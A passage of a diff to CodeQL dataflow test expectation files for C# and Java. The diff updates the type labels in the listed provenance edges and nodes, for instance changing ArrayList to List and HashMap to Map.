H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | provenance | | +| H.cs:165:20:165:20 | access to local variable a : A [field FieldA, field FieldB] : Object | H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | provenance | | | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | H.cs:165:20:165:27 | access to field FieldA : B | provenance | | | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | H.cs:165:20:165:27 | access to field FieldA : B | provenance | | | H.cs:165:20:165:27 | access to field FieldA : B | H.cs:165:17:165:27 | (...) ... : B | provenance | | | H.cs:165:20:165:27 | access to field FieldA : B | H.cs:165:17:165:27 | (...) ... : B | provenance | | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | H.cs:167:14:167:21 | access to field FieldB | provenance | | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | H.cs:167:14:167:21 | access to field FieldB | provenance | | | I.cs:5:12:5:12 | this [Return] : I [field Field1] : Object | I.cs:21:13:21:19 | object creation of type I : I [field Field1] : Object | provenance | | @@ -2033,8 +2033,8 @@ nodes | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | semmle.label | (...) ... : A [field FieldA] : Object | | H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | semmle.label | access to local variable temp : B [field FieldB, field FieldA] : Object | | H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | semmle.label | access to local variable temp : B [field FieldB, field FieldA] : Object | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | semmle.label | access to field FieldB : A [field FieldA] : Object | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | semmle.label | access to field FieldB : A [field FieldA] : Object | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | semmle.label | access to field FieldB : Object [field FieldA] : Object | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | semmle.label | access to field FieldB : Object [field FieldA] : Object | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | semmle.label | [post] access to local variable a : A [field FieldA] : Object | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | semmle.label | [post] access to local variable a : A [field FieldA] : Object | | H.cs:112:20:112:36 | call to method Source : Object | semmle.label | call to method Source : Object | @@ -2133,8 +2133,8 @@ nodes | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | semmle.label | access to local variable a : A [field FieldA] : B | | H.cs:165:20:165:27 | access to field FieldA : B | semmle.label | access to field FieldA : B | | H.cs:165:20:165:27 | access to field FieldA : B | semmle.label | access to field FieldA : B | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | semmle.label | access to field FieldA : B [field FieldB] : Object | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | semmle.label | access to field FieldA : B [field FieldB] : Object | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | semmle.label | access to field FieldA : Object [field FieldB] : Object | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | semmle.label | access to field FieldA : Object [field FieldB] : Object | | H.cs:166:14:166:14 | access to local variable b | semmle.label | access to local variable b | | H.cs:166:14:166:14 | access to local variable b | semmle.label | access to local variable b | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | semmle.label | access to local variable b : B [field FieldB] : Object | diff --git a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected index 74c1c62de1f..c5f00cd656f 100644 --- a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected @@ -136,8 +136,8 @@ edges | Capture.cs:334:9:334:30 | access to local function CapturingLocalFunction : CapturingLocalFunction [captured x] : String | Capture.cs:332:42:332:62 | access to local function CapturedLocalFunction : CapturedLocalFunction [captured x] : String | provenance | | | Capture.cs:339:17:339:30 | "taint source" : String | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | provenance | | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | provenance | | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | -| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | provenance | | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | +| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured s] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | @@ -639,7 +639,7 @@ nodes | Capture.cs:339:17:339:30 | "taint source" : String | semmle.label | "taint source" : String | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | semmle.label | (...) => ... : (...) => ... [captured x] : String | | Capture.cs:341:45:341:45 | access to local variable x | semmle.label | access to local variable x | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | semmle.label | access to local variable capturedLambda : (...) => ... [captured x] : String | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | semmle.label | access to local variable capturedLambda : Action [captured x] : String | | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | semmle.label | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | semmle.label | a : (...) => ... [captured s] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | semmle.label | a : (...) => ... [captured sink39] : String | diff --git a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected index 1d05b0ae55e..f90f71d1ea9 100644 --- a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected @@ -146,8 +146,8 @@ edges | Capture.cs:334:9:334:30 | access to local function CapturingLocalFunction : CapturingLocalFunction [captured x] : String | Capture.cs:332:42:332:62 | access to local function CapturedLocalFunction : CapturedLocalFunction [captured x] : String | provenance | | | Capture.cs:339:17:339:30 | "taint source" : String | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | provenance | | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | provenance | | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | -| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | provenance | | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | +| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured s] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | @@ -709,7 +709,7 @@ nodes | Capture.cs:339:17:339:30 | "taint source" : String | semmle.label | "taint source" : String | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | semmle.label | (...) => ... : (...) => ... [captured x] : String | | Capture.cs:341:45:341:45 | access to local variable x | semmle.label | access to local variable x | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | semmle.label | access to local variable capturedLambda : (...) => ... [captured x] : String | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | semmle.label | access to local variable capturedLambda : Action [captured x] : String | | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | semmle.label | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | semmle.label | a : (...) => ... [captured s] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | semmle.label | a : (...) => ... [captured sink39] : String | diff --git a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected index efd347890dd..d127b92ddaf 100644 --- a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected +++ b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected @@ -12,12 +12,12 @@ edges | B.java:13:5:13:6 | l1 : ArrayList [] : String | B.java:13:16:13:16 | e : String | provenance | MaD:1 | | B.java:13:5:13:6 | l1 : ArrayList [] : String | B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | provenance | MaD:1 | | B.java:13:16:13:16 | e : String | B.java:13:28:13:28 | e : String | provenance | | -| B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | List l2 : ArrayList [] : String | provenance | | -| B.java:13:16:13:29 | List l2 : ArrayList [] : String | B.java:14:10:14:11 | l2 : ArrayList [] : String | provenance | | +| B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | List l2 : List [] : String | provenance | | +| B.java:13:16:13:29 | List l2 : List [] : String | B.java:14:10:14:11 | l2 : List [] : String | provenance | | | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | provenance | | | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | provenance | | | B.java:13:28:13:28 | e : String | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:14:10:14:11 | l2 : ArrayList [] : String | B.java:14:10:14:18 | get(...) | provenance | MaD:3 | +| B.java:14:10:14:11 | l2 : List [] : String | B.java:14:10:14:18 | get(...) | provenance | MaD:3 | | B.java:22:26:22:26 | x : String | B.java:22:68:22:68 | x : String | provenance | | | B.java:22:56:22:60 | other [post update] : B [bf1] : String | B.java:22:56:22:60 | this : new Consumer(...) { ... } [B other, bf1] : String | provenance | | | B.java:22:56:22:60 | this : new Consumer(...) { ... } [B other, bf1] : String | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | provenance | | @@ -33,10 +33,10 @@ edges | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:18:39:20 | key : String | provenance | MaD:4 | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | provenance | MaD:5 | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:23:39:27 | value : String | provenance | MaD:5 | -| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | out : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | out : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | provenance | | +| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : Map [] : String | provenance | | +| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : Map [] : String | provenance | | +| B.java:39:17:39:56 | out : Map [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | provenance | | +| B.java:39:17:39:56 | out : Map [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | provenance | | | B.java:39:18:39:20 | key : String | B.java:39:43:39:45 | key : String | provenance | | | B.java:39:23:39:27 | value : String | B.java:39:48:39:52 | value : String | provenance | | | B.java:39:35:39:37 | out [post update] : HashMap [] : String | B.java:39:35:39:37 | this : new BiConsumer(...) { ... } [out, ] : String | provenance | | @@ -94,30 +94,30 @@ edges | B.java:103:5:103:6 | l2 [post update] : ArrayList [, ] : String | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | provenance | | | B.java:103:12:103:13 | l1 : ArrayList [] : String | B.java:103:5:103:6 | l2 [post update] : ArrayList [, ] : String | provenance | MaD:2 | | B.java:104:16:104:32 | source(...) : String | B.java:107:16:111:6 | String s : String | provenance | | -| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : ArrayList [] : String | provenance | MaD:1 | +| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : List [] : String | provenance | MaD:1 | | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | provenance | MaD:1 | -| B.java:107:16:107:16 | l : ArrayList [] : String | B.java:107:21:107:21 | l : ArrayList [] : String | provenance | | +| B.java:107:16:107:16 | l : List [] : String | B.java:107:21:107:21 | l : List [] : String | provenance | | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | provenance | MaD:1 | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | provenance | heuristic-callback | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | provenance | MaD:1 | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | provenance | heuristic-callback | -| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | List out1 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | List out2 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | List out1 : ArrayList [] : String | B.java:112:10:112:13 | out1 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | List out2 : ArrayList [] : String | B.java:113:10:113:13 | out2 : ArrayList [] : String | provenance | | +| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | List out1 : List [] : String | provenance | | +| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | List out2 : List [] : String | provenance | | +| B.java:107:16:111:6 | List out1 : List [] : String | B.java:112:10:112:13 | out1 : List [] : String | provenance | | +| B.java:107:16:111:6 | List out2 : List [] : String | B.java:113:10:113:13 | out2 : List [] : String | provenance | | | B.java:107:16:111:6 | String s : String | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | provenance | | | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [String s] : String | provenance | | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:107:31 | x : String | provenance | MaD:1 | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | provenance | MaD:1 | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:107:31 | x : String | provenance | MaD:1 | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | provenance | MaD:1 | | B.java:107:31:107:31 | x : String | B.java:109:16:109:16 | x : String | provenance | | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | provenance | MaD:1 | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | provenance | heuristic-callback | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | provenance | MaD:1 | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | provenance | heuristic-callback | -| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | List out1 : ArrayList [] : String | provenance | | -| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | List out2 : ArrayList [] : String | provenance | | -| B.java:107:31:111:5 | List out1 : ArrayList [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out1, ] : String | provenance | | -| B.java:107:31:111:5 | List out2 : ArrayList [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out2, ] : String | provenance | | +| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | List out1 : List [] : String | provenance | | +| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | List out2 : List [] : String | provenance | | +| B.java:107:31:111:5 | List out1 : List [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out1, ] : String | provenance | | +| B.java:107:31:111:5 | List out2 : List [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out2, ] : String | provenance | | | B.java:107:31:111:5 | String s : String | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | provenance | | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:108:12:108:12 | this : new Consumer(...) { ... } [String s] : String | provenance | | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | provenance | | @@ -132,8 +132,8 @@ edges | B.java:110:7:110:10 | this : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out2, ] : String | provenance | | | B.java:110:16:110:16 | s : String | B.java:110:7:110:10 | out2 [post update] : ArrayList [] : String | provenance | MaD:2 | | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | B.java:110:16:110:16 | s : String | provenance | | -| B.java:112:10:112:13 | out1 : ArrayList [] : String | B.java:112:10:112:20 | get(...) | provenance | MaD:3 | -| B.java:113:10:113:13 | out2 : ArrayList [] : String | B.java:113:10:113:20 | get(...) | provenance | MaD:3 | +| B.java:112:10:112:13 | out1 : List [] : String | B.java:112:10:112:20 | get(...) | provenance | MaD:3 | +| B.java:113:10:113:13 | out2 : List [] : String | B.java:113:10:113:20 | get(...) | provenance | MaD:3 | | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:127:9:127:10 | l1 [post update] : ArrayList [] : String | B.java:127:9:127:10 | this : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:127:9:127:10 | this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | @@ -144,14 +144,14 @@ edges | B.java:131:16:131:17 | l1 : ArrayList [] : String | B.java:131:16:131:24 | get(...) : String | provenance | MaD:3 | | B.java:131:16:131:17 | this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:131:16:131:17 | l1 : ArrayList [] : String | provenance | | | B.java:131:16:131:24 | get(...) : String | B.java:131:9:131:10 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:136:5:136:5 | List l1 : ArrayList [] : String | B.java:137:5:137:5 | List l1 : ArrayList [] : String | provenance | | -| B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | List l1 : ArrayList [] : String | provenance | | -| B.java:137:5:137:5 | List l1 : ArrayList [] : String | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | -| B.java:137:5:137:5 | List l2 : ArrayList [] : String | B.java:138:10:138:11 | l2 : ArrayList [] : String | provenance | | +| B.java:136:5:136:5 | List l1 : List [] : String | B.java:137:5:137:5 | List l1 : List [] : String | provenance | | +| B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | List l1 : List [] : String | provenance | | +| B.java:137:5:137:5 | List l1 : List [] : String | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | +| B.java:137:5:137:5 | List l2 : List [] : String | B.java:138:10:138:11 | l2 : List [] : String | provenance | | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | provenance | MaD:3 | -| B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | B.java:137:5:137:5 | List l2 : ArrayList [] : String | provenance | | -| B.java:138:10:138:11 | l2 : ArrayList [] : String | B.java:138:10:138:18 | get(...) | provenance | MaD:3 | +| B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | B.java:137:5:137:5 | List l2 : List [] : String | provenance | | +| B.java:138:10:138:11 | l2 : List [] : String | B.java:138:10:138:18 | get(...) | provenance | MaD:3 | | B.java:142:16:142:31 | source(...) : String | B.java:148:17:148:29 | String s : String | provenance | | | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | B.java:145:28:145:28 | this : MyLocal [String s] : String | provenance | | | B.java:145:19:145:22 | this [post update] : MyLocal [f] : String | B.java:145:7:145:13 | parameter this [Return] : MyLocal [f] : String | provenance | | @@ -204,11 +204,11 @@ edges | B.java:175:5:175:6 | String s2 : String | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | provenance | | | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | provenance | | | B.java:175:5:175:6 | m1 : MyLocal [f] : String | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | provenance | | -| B.java:177:5:177:6 | List l : ArrayList [] : String | B.java:178:10:178:11 | List l : ArrayList [] : String | provenance | | -| B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | B.java:177:5:177:6 | List l : ArrayList [] : String | provenance | | +| B.java:177:5:177:6 | List l : List [] : String | B.java:178:10:178:11 | List l : List [] : String | provenance | | +| B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | B.java:177:5:177:6 | List l : List [] : String | provenance | | | B.java:177:12:177:27 | source(...) : String | B.java:166:16:166:23 | s : String | provenance | | | B.java:177:12:177:27 | source(...) : String | B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | provenance | MaD:2 | -| B.java:178:10:178:11 | List l : ArrayList [] : String | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | provenance | | +| B.java:178:10:178:11 | List l : List [] : String | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | provenance | | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | B.java:169:14:169:16 | parameter this : MyLocal [List l, ] : String | provenance | | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | B.java:178:10:178:17 | get(...) | provenance | MaD:3 | | B.java:203:16:203:42 | source(...) : String | B.java:212:5:212:6 | String s : String | provenance | | @@ -220,17 +220,17 @@ edges | B.java:207:15:207:42 | source(...) : String | B.java:207:7:207:9 | out [post update] : ArrayList [] : String | provenance | MaD:2 | | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | provenance | | -| B.java:210:7:210:8 | List out : ArrayList [] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | provenance | | +| B.java:210:7:210:8 | List out : List [] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | provenance | | | B.java:210:7:210:8 | String s : String | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | B.java:205:19:208:5 | parameter this : new Runnable(...) { ... } [String s] : String | provenance | | -| B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:210:7:210:8 | List out : ArrayList [] : String | provenance | | +| B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:210:7:210:8 | List out : List [] : String | provenance | | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | provenance | | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [String s] : String | B.java:210:7:210:8 | String s : String | provenance | | -| B.java:212:5:212:6 | List out : ArrayList [] : String | B.java:213:10:213:12 | out : ArrayList [] : String | provenance | | +| B.java:212:5:212:6 | List out : List [] : String | B.java:213:10:213:12 | out : List [] : String | provenance | | | B.java:212:5:212:6 | String s : String | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | provenance | | -| B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | List out : ArrayList [] : String | provenance | | -| B.java:213:10:213:12 | out : ArrayList [] : String | B.java:213:10:213:19 | get(...) | provenance | MaD:3 | +| B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | List out : List [] : String | provenance | | +| B.java:213:10:213:12 | out : List [] : String | B.java:213:10:213:19 | get(...) | provenance | MaD:3 | | B.java:231:16:231:28 | source(...) : String | B.java:247:5:247:18 | String s : String | provenance | | | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | B.java:238:15:238:15 | this : MyLocal2 [String s] : String | provenance | | | B.java:238:9:238:9 | l [post update] : ArrayList [] : String | B.java:238:9:238:9 | this : MyLocal2 [List l, ] : String | provenance | | @@ -243,17 +243,17 @@ edges | B.java:241:16:241:16 | l : ArrayList [] : String | B.java:241:16:241:23 | get(...) : String | provenance | MaD:3 | | B.java:241:16:241:16 | this : MyLocal2 [List l, ] : String | B.java:241:16:241:16 | l : ArrayList [] : String | provenance | | | B.java:241:16:241:23 | get(...) : String | B.java:241:9:241:10 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:247:5:247:18 | List l2 : ArrayList [] : String | B.java:249:10:249:11 | l2 : ArrayList [] : String | provenance | | -| B.java:247:5:247:18 | List l : ArrayList [] : String | B.java:248:10:248:10 | l : ArrayList [] : String | provenance | | +| B.java:247:5:247:18 | List l2 : List [] : String | B.java:249:10:249:11 | l2 : List [] : String | provenance | | +| B.java:247:5:247:18 | List l : List [] : String | B.java:248:10:248:10 | l : List [] : String | provenance | | | B.java:247:5:247:18 | String s : String | B.java:247:5:247:18 | new 